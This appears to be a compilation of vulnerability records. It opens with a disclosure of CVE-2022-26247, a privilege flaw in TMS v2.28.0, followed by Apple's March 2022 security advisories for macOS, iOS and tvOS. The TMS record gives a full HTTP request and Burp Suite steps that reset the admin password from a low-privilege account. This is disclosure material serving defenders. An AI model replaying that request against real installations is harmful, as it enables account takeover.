TMS v2.28.0 contains an insecure permissions vulnerability via the component /TMS/admin/user/Update2. This vulnerability allows attackers to modify the administrator account and password.

\[Suggested description\]  
There is an ultra vires vulnerability in the function of modifying personal information in TMS.The vulnerability originates from / TMS / admin / user / Update2. The administrator account and password can be modified beyond his authority by modifying the packet parameters.

\[Vulnerability Type\]  
Insecure Permissions

\[Vendor of Product\]  
https://github.com/xiweicheng/tms

\[Affected Product Code Base\]  
v2.28.0

\[Affected Component\]  
POST /tms/admin/user/update2 HTTP/1.1  
Host: localhost:8080  
Content-Length: 66  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Origin: http://localhost:8080/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost:8080/tms/admin/user  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: JSESSIONID=B45BEAFD82AAE86E3D98FE866FA0851E; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645604517; Hm\_lpvt\_a4980171086658b20eb2d9b523ae1b7b=1645604534  
Connection: close

username=admin&password=88888888&name=admin&mail=admin%40google.com&=

\[Attack Type\]  
Remote

\[Vulnerability proof\]

1.Access with test account http://localhost:8080/tms/admin  
![image](https://user-images.githubusercontent.com/85676107/155444006-6a467eb6-814c-4f59-8df6-3bbc3d1339ca.png)

2.In order to verify the authenticity of the ultra vires vulnerability, I have prepared a system administrator account. Account number: admin, default password: 88888888.  
![image](https://user-images.githubusercontent.com/85676107/155444066-c4bc8f95-8d4a-44e8-bfca-f282863d6355.png)  
Now I log in to the test account to try to change the information and password of the admin account.

3.Click the user icon in the upper right corner and select Modify in the drop-down box to open the modify personal information pop-up window.  
![image](https://user-images.githubusercontent.com/85676107/155444117-40e555fb-647e-4b40-be6d-13c83f31e4cc.png)  
![image](https://user-images.githubusercontent.com/85676107/155444148-ccf99e0a-91ff-4a61-a732-ed612c35aa56.png)

4.Because there is no need to verify the user's original password, you can set the new password directly. Here, the password is set as change123 in the form submission, and other information will not be changed. Open the burpsuite packet capturing agent - > click the confirm submit button.  
![image](https://user-images.githubusercontent.com/85676107/155444175-0f9890ac-cefc-4960-a4ba-ee09ffba5c06.png)

5.Modify the packet capture data, as shown in the following figure.  
![image](https://user-images.githubusercontent.com/85676107/155444200-a9d0f185-6c03-4642-a7de-5fbf276c9550.png)

6.Click forwad to finish the modification.  
![image](https://user-images.githubusercontent.com/85676107/155444218-0aa54095-ca59-4bac-bf75-e6e295052fc3.png)

The information of viewing admin has changed.Vulnerability recurrence completed.  
![image](https://user-images.githubusercontent.com/85676107/155444254-8f0dbdd3-6361-4c2c-99d8-01c0d04e71bb.png)

CVE-2022-26247: There is a Insecure Permissions vulnerability exists in tms · Issue #16 · xiweicheng/tms

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Monterey

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: an anonymous researcher

**AMD**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22669: an anonymous researcher

**AppKit**

Available for: macOS Monterey

Impact: A malicious application may be able to gain root privileges

Description: A logic issue was addressed with improved validation.

CVE-2022-22665: Lockheed Martin Red Team

**AppleGraphicsControl**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22631: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: An application may be able to read restricted memory

Description: This issue was addressed with improved checks.

CVE-2022-22648: an anonymous researcher

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro

CVE-2022-22627: Qi Sun and Robert Ai of Trend Micro

**AppleScript**

Available for: macOS Monterey

Impact: Processing a maliciously crafted file may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22597: Qi Sun and Robert Ai of Trend Micro

**BOM**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**curl**

Available for: macOS Monterey

Impact: Multiple issues in curl

Description: Multiple issues were addressed by updating to curl version 7.79.1.

CVE-2021-22946

CVE-2021-22947

CVE-2021-22945

Entry updated March 21, 2022

**FaceTime**

Available for: macOS Monterey

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: macOS Monterey

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**Intel Graphics Driver**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A type confusion issue was addressed with improved state handling.

CVE-2022-22661: an anonymous researcher, Peterpan0927 of Alibaba Security Pandora Lab

**IOGPUFamily**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: macOS Monterey

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: macOS Monterey

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: macOS Monterey

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**libarchive**

Available for: macOS Monterey

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Login Window**

Available for: macOS Monterey

Impact: A person with access to a Mac may be able to bypass Login Window

Description: This issue was addressed with improved checks.

CVE-2022-22647: an anonymous researcher

**LoginWindow**

Available for: macOS Monterey

Impact: A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22656

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2022-22657: Brandon Perry of Atredis Partners

**GarageBand MIDI**

Available for: macOS Monterey

Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2022-22664: Brandon Perry of Atredis Partners

**NSSpellChecker**

Available for: macOS Monterey

Impact: A malicious application may be able to access information about a user's contacts

Description: A privacy issue existed in the handling of Contact cards. This was addressed with improved state management.

CVE-2022-22644: an anonymous researcher

**PackageKit**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22617: Mickey Jin (@patch1t)

**Preferences**

Available for: macOS Monterey

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**QuickTime Player**

Available for: macOS Monterey

Impact: A plug-in may be able to inherit the application's permissions and access user data

Description: This issue was addressed with improved checks.

CVE-2022-22650: Wojciech Reguła (@\_r3ggi) of SecuRing

**Safari Downloads**

Available for: macOS Monterey

Impact: A maliciously crafted ZIP archive may bypass Gatekeeper checks

Description: This issue was addressed with improved checks.

CVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)

**Sandbox**

Available for: macOS Monterey

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: macOS Monterey

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SMB**

Available for: macOS Monterey

Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22651: Felix Poulin-Belanger

**SoftwareUpdate**

Available for: macOS Monterey

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey Jin (@patch1t)

**System Preferences**

Available for: macOS Monterey

Impact: An app may be able to spoof system notifications and UI

Description: This issue was addressed with a new entitlement.

CVE-2022-22660: Guilherme Rambo of Best Buddy Apps (rambo.codes)

**UIKit**

Available for: macOS Monterey

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**Vim**

Available for: macOS Monterey

Impact: Multiple issues in Vim

Description: Multiple issues were addressed by updating Vim.

CVE-2021-4136

CVE-2021-4166

CVE-2021-4173

CVE-2021-4187

CVE-2021-4192

CVE-2021-4193

CVE-2021-46059

CVE-2022-0128

CVE-2022-0156

CVE-2022-0158

**VoiceOver**

Available for: macOS Monterey

Impact: A user may be able to view restricted content from the lock screen

Description: A lock screen issue was addressed with improved state management.

CVE-2021-30918: an anonymous researcher

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: macOS Monterey

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: macOS Monterey

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: macOS Monterey

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

**xar**

Available for: macOS Monterey

Impact: A local user may be able to write arbitrary files

Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.

CVE-2022-22582: Richard Warren of NCC Group

CVE-2022-22665: About the security content of macOS Monterey 12.3

An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen.

Released March 14, 2022

**Accelerate Framework**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

CVE-2022-22633: an anonymous researcher

**AppleAVD**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-22634: an anonymous researcher

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22635: an anonymous researcher

**AVEVideoEncoder**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22636: an anonymous researcher

**Cellular**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access may be able to view and modify the carrier account information and settings from the lock screen

Description: The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel.

CVE-2022-22652: Kağan Eğlence (linkedin.com/in/kaganeglence)

**CoreMedia**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An app may be able to learn information about the current camera view before being granted camera access

Description: An issue with app access to camera metadata was addressed with improved logic.

CVE-2022-22598: Will Blaschko of Team Quasko

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22642: Yicong Ding (@AntonioDing)

**FaceTime**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may send audio and video in a FaceTime call without knowing that they have done so

Description: This issue was addressed with improved checks.

CVE-2022-22643: Sonali Luthar of the University of Virginia, Michael Liao of the University of Illinois at Urbana-Champaign, Rohan Pahwa of Rutgers University, and Bao Nguyen of the University of Florida

**GPU Drivers**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22667: Justin Sherman of the University of Maryland, Baltimore County

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**IOGPUFamily**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**iTunes**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may be able to access information about the user and their devices

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22653: Aymeric Chaib of CERT Banque de France

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22596: an anonymous researcher

CVE-2022-22640: sqrtpwn

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**libarchive**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Multiple issues in libarchive

Description: Multiple memory corruption issues existed in libarchive. These issues were addressed with improved input validation.

CVE-2021-36976

**Markup**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22622: Ingyu Lim (@\_kanarena)

**MediaRemote**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to identify what other applications a user has installed

Description: An access issue was addressed with improved access restrictions.

CVE-2022-22670: Brandon Azad

**NetworkExtension**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An attacker in a privileged network position may be able to leak sensitive user information

Description: A logic issue was addressed with improved state management.

CVE-2022-22659: an anonymous researcher

**Phone**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A user may be able to bypass the Emergency SOS passcode prompt

Description: This issue was addressed with improved checks.

CVE-2022-22618: Yicong Ding (@AntonioDing)

**Preferences**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Sandbox**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**Siri**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen

Description: A permissions issue was addressed with improved validation.

CVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg/)

**SoftwareUpdate**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: An application may be able to gain elevated privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22639: Mickey (@patch1t)

**UIKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**VoiceOver**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A person with physical access to an iOS device may be able to access photos from the lock screen

Description: An authentication issue was addressed with improved state management.

CVE-2022-22671: videosdebarraquito

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

**Wi-Fi**

Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)

Impact: A malicious application may be able to leak sensitive user information

Description: A logic issue was addressed with improved restrictions.

CVE-2022-22668: MrPhil17

CVE-2022-22671: About the security content of iOS 15.4 and iPadOS 15.4

An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed.

Released March 14, 2022

**AppleAVD**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22666: Marc Schoenefeld, Dr. rer. nat.

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to execute arbitrary code with kernel privileges

Description: A buffer overflow was addressed with improved bounds checking.

CVE-2022-22634: an anonymous researcher

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22635: an anonymous researcher

**AVEVideoEncoder**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22636: an anonymous researcher

**ImageIO**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2022-22611: Xingyu Jin of Google

**ImageIO**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing a maliciously crafted image may lead to heap corruption

Description: A memory consumption issue was addressed with improved memory handling.

CVE-2022-22612: Xingyu Jin of Google

**IOGPUFamily**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to gain elevated privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22641: Mohamed Ghannam (@\_simo36)

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved bounds checking.

CVE-2022-22613: Alex, an anonymous researcher

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A use after free issue was addressed with improved memory management.

CVE-2022-22614: an anonymous researcher

CVE-2022-22615: an anonymous researcher

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to elevate privileges

Description: A logic issue was addressed with improved state management.

CVE-2022-22632: Keegan Saunders

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An attacker in a privileged position may be able to perform a denial of service attack

Description: A null pointer dereference was addressed with improved validation.

CVE-2022-22638: derrek (@derrekr6)

**Kernel**

Available for: Apple TV 4K and Apple TV HD

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved validation.

CVE-2022-22640: sqrtpwn

**MediaRemote**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to identify what other applications a user has installed

Description: An access issue was addressed with improved access restrictions.

CVE-2022-22670: Brandon Azad

**Preferences**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to read other applications' settings

Description: The issue was addressed with additional permissions checks.

CVE-2022-22609: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com)

**Sandbox**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious application may be able to bypass certain Privacy preferences

Description: The issue was addressed with improved permissions logic.

CVE-2022-22600: Sudhakar Muthumani of Primefort Private Limited, Khiem Tran

**UIKit**

Available for: Apple TV 4K and Apple TV HD

Impact: A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions

Description: This issue was addressed with improved checks.

CVE-2022-22621: Joey Hewitt

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A cookie management issue was addressed with improved state management.

WebKit Bugzilla: 232748  
CVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 232812  
CVE-2022-22610: Quan Yin of Bigo Technology Live Client Team

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 233172  
CVE-2022-22624: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

WebKit Bugzilla: 234147  
CVE-2022-22628: Kirin (@Pwnrin) of Tencent Security Xuanwu Lab

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A buffer overflow issue was addressed with improved memory handling.

WebKit Bugzilla: 234966  
CVE-2022-22629: Jeonghoon Shin at Theori working with Trend Micro Zero Day Initiative

**WebKit**

Available for: Apple TV 4K and Apple TV HD

Impact: A malicious website may cause unexpected cross-origin behavior

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 235294  
CVE-2022-22637: Tom McKee of Google

CVE-2022-22670: About the security content of tvOS 15.4

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges.

Released March 14, 2022

**Accelerate Framework**

Available for: macOS Monterey

Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

